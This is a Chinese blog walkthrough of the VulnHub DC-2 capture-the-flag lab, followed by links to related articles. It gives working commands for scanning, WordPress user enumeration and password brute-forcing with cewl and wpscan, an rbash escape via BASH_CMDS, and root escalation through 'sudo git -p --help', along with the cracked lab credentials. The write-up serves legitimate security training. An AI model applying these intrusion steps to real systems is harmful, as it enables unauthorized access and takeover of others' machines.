DC-2靶机详解

最新推荐文章于 2024-05-18 19:56:12 发布
最新推荐文章于 2024-05-18 19:56:12 发布
阅读量1.2k 收藏 29
点赞数 22
分类专栏: 内网渗透 文章标签: linux 运维 服务器 DC-2 内网渗透 wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75023818/article/details/136434664
版权

写写自己打DC-2的过程

使用工具 kali

DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/

环境配置。

Kali和DC-2都设置为NAT模式,都为仅主机模式也可以。

信息收集

arp-scan -l

nmap -sn 192.168.236.0/24

获取靶机ip:192.168.236.140

扫描靶机端口:

nmap -sS -T5 --min-rate 10000 192.168.236.140 -sC -p-

开放了80和7744端口

FLAG1

尝试访问一下DC-2:192.168.236.140

本地访问不了会自动跳到DC-2。应该是给重定向了!

我们本地dns绑定下

可以访问本地hosts
C:\Windows\System32\drivers\etc
修改hosts文件
修改不了的话,右键属性 取消只读 保存就可以了

添加这样子的一条

重新访问就进去了,发现下面有个flag,得到第一个flag

点进去提示我们要使用cewl工具

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

FLAG2

看看网站字典,保存下来

cewl http://dc-2 -w passwd.txt

注意:本来用 cewl http://192.168.28.179 -w passwd.txt 的但是没有任何输出,想想应该是ip给重定向了,用域名就可以了。

cat passwd.txt 查看下字典

有了密码字典 还需要找用户名

用dirb来扫目录

发现经典的wordpress登录框,admin.php非常有可能。我们去访问

网站我们拿到了 还需要账号

这一看就是Wordpress。

Wordpress有一个著名的扫描工具wpscan

缺用户名那么我们就

wpscan --url http://dc-2/ -e u //枚举用户名字

枚举出来的3个账号

admin
jerry
tom

将这三个用户名存储在一个文本文件中

使用wpscan爆破账号密码

wpscan --url http://dc-2/ -U user.txt -P passwd.txt

爆破出来了两组用户名和密码

jerry /adipiscing

tom / parturient

登录wordpress主页

登录成功!

注意:上面url有时候不会跳到http://dc-2/wp-admin/ 导致登录后空白,可以登录后输入url 就可以进去了。

仔细找找多点点FLAG就出来了

提示说:wordpress找不到其他的东西了

FLAG3

想起来了前面有个ssh改端口的改成了7744

然后也了个WordPress的账号密码,可以尝试登录下

ssh jerry@192.168.236.140 -p 7744 
ssh tom@192.168.236.140 -p 7744

尝试三次发现jerry无法登录

尝试tom用户,成功登录

ls查看当前目录的文件

发现了flag3.txt

cat flag3.txt


发现命令无法使用

compgen -c       //查看可以使用的指令

发现vi可以使用

vi flag3.txt

发现flag3.txt

FLAG4

提示说:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

可怜的老汤姆老是追杰瑞。也许他应该为他造成的所有压力负责。

发现tom只能使用less、ls、scp、vi命令,无法直接使用su命令切换用户

BASH_CMDS[a]=/bin/sh ; a  #调用/bin/sh命令解释器
/bin/bash   #使用bash命令解释器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin  #设置环境变量

此时命令基本上都可以使用,也可以table补全命令

切换到jerry用户,进入jerry家目录下

su jerry  
adipiscing   #jerry用户登录密码

ls 找到flag4.txt,提示使用git 命令

Flag4:

Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!). 

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

sudo -l    #查看可以使用root权限无密码的命令,有git命令
sudo git -p –-help  #提权

passwd  root   #修改root密码
123456    #密码修改为:123456

su root   #切换到root用户
cd /root  #进入到root家目录下
ls    #找到final-flag.txt

参考文章:Vulnhub靶机实战——DC-2_dc-2靶机-CSDN博客

靶机练习:DC-2靶机复现_dc-2靶场打完重置-CSDN博客

当然还有很多方法,我这只是最简单的。

勿喷!!!!

苏生要努力
关注
  • 22
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4704
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
DC2-靶机
Au
08-19 1727
下载地址 我配置的环境: kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.1...
vulnhub靶场实战系列-DC-2实战
最新发布
weixin_45221204的博客
05-18 1269
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行,本文使用VMware测试,每个镜像会有破解的目标,挑战的目标是获取操作系统的root权限和获得flag。WordPress CMS的信息搜集与利用,获得flag,根据提示进一步操作使用cewl获得目标上存在的用户信息,获得密码字典使用wpscan进行WordPress网站用户名爆破,生成用户字典使用wpscan进一步爆破获得可用的密码和用户。
DC-2 靶机
m0_56171651的博客
08-16 1203
DC-2靶机渗透复现
DC-2靶机
Flamingo1998的博客
02-09 220
DC-2靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
靶机DC-2
weixin_43940853的博客
11-18 207
目标靶机 : 192.168.230.228 kali : 192.168.230.226 发现是wordpress,考虑wpscan 点击flag,根据提示,需要用到cewl 简单的讲,这个工具是利用页面爬取深度生成字典的一个工具 wpscan -u http://dc-2 -eu -et -ep 利用wpscan扫一下用户名(一开始我以为用户名和密码都能扫出来,-ep还以为是passwo...
靶机 DC-2
m0_66299232的博客
09-13 1026
rbash是什么?rbash与一般shell的区别在于会限制一些行为,让一些命令无法执行。1>如何设置一个rbashcp /bin/bash /bin/rbash # 复制一个bash,重命名为rbashmkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令2>rbash提权export -p //查看环境变量a //把/bin/sh给a/bin/bash。
DC-2靶机(新手村)
热门推荐
weixin_42238862的博客
02-14 1万+
马上要开学了,又要去学习奇奇怪怪的古老的知识了!趁机在开学前争取能把靶机多打一点,充实一下自己的假期!那就开始我们的DC系列之DC-2 还是和第一篇一下,起手寻找目标,找到我们需要和谁一决胜负,这里我还是使用arp-scan进行目标机的确定 可以看到这几个IP,由经验可知,目标机是192.168.11.109这个IP。那我们就需要nmap去开路了呀,希望能找到一些可用的信息帮助我们拿到一个小小的shell。 这是我们使用nmap找到的信息,当然得去看看他的网站了呀 然后就看到了这个,这就需要懂得一点点
vulnhub靶机DC-2
Keepb1ue的博客
09-29 2612
靶机配置说明 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机DC1 (VirtualBox) IP:192.168.56.111 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中也有详细的靶机说明,而FunBox需要寻找的flag总数为5个 靶机环境配置: 还是一样,将其桥接到同一张网卡即可。 靶机渗透开始: kali IP: 第一步还是需要确定目标IP 确定目标ip为192.168.56.111后nmap扫描下端
渗透测试:DC-2靶机
Ciyaso的博客
08-16 208
一、扫描获取靶机ip 用nmap扫描192.168.203.0/24以获取靶机ip arp-scan -l 192.168.203.139 二、获取网站信息 1.nmap nmap -A -v -sS -sV -p- 192.168.203.139 开放了80端口、7744端口 2.Wappaloyzer web服务器:Apache 2.4.10 CMS:WordPress 数据库: Mysql JS库:jQuery 进入页面发现访问不了 查看发现直接访问80端口会跳转到http://dc
渗透测试学习之靶机DC-2
xdbzdgx的博客
11-08 3049
1.下载靶机 本篇文章是DC靶机系列的第二个篇,针对DC-2,建议感兴趣的读者从DC-1开始练习((26条消息) 渗透测试学习之靶机DC-1_xdbzdgx的博客-CSDN博客)。 DC-2的下载地址为DC: 2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值